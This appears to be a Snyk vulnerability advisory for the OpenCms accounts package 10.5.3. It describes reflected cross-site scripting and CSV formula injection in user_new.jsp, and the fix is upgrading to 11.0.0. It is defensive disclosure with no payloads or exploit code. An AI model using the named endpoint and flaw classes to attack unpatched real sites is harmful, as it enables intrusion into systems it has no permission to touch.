org.opencms:org.opencms.workplace.tools.accounts@10.5.3 vulnerabilities

Direct Vulnerabilities

Known vulnerabilities in the org.opencms:org.opencms.workplace.tools.accounts package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Cross-site Scripting (XSS)

org.opencms:org.opencms.workplace.tools.accounts is an enterprise-ready, easy to use website content management system based on Java and XML technology.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). The user_new.jsp available within the /resources/system/workplace/admin/accounts/ area allows an attacker to insert arbitrary JavaScript as user input which will then be reflected back within a user's browser without any output encoding.

How to fix Cross-site Scripting (XSS)?

Upgrade org.opencms:org.opencms.workplace.tools.accounts to version 11.0.0 or higher.

[6.2.0,11.0.0)
  • M
CSV Injection

org.opencms:org.opencms.workplace.tools.accounts is an enterprise-ready, easy to use website content management system based on Java and XML technology.

Affected versions of this package are vulnerable to CSV Injection. CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program is used to open a CSV, any cells starting with '=' will be interpreted by the software as a formula. The user_new.jsp file located within /resources/system/workplace/admin/accounts/ allows untrusted input to be save as formulas which could then be later exported as part of account management related administration views.

How to fix CSV Injection?

Upgrade org.opencms:org.opencms.workplace.tools.accounts to version 11.0.0 or higher.

[6.2.0,11.0.0)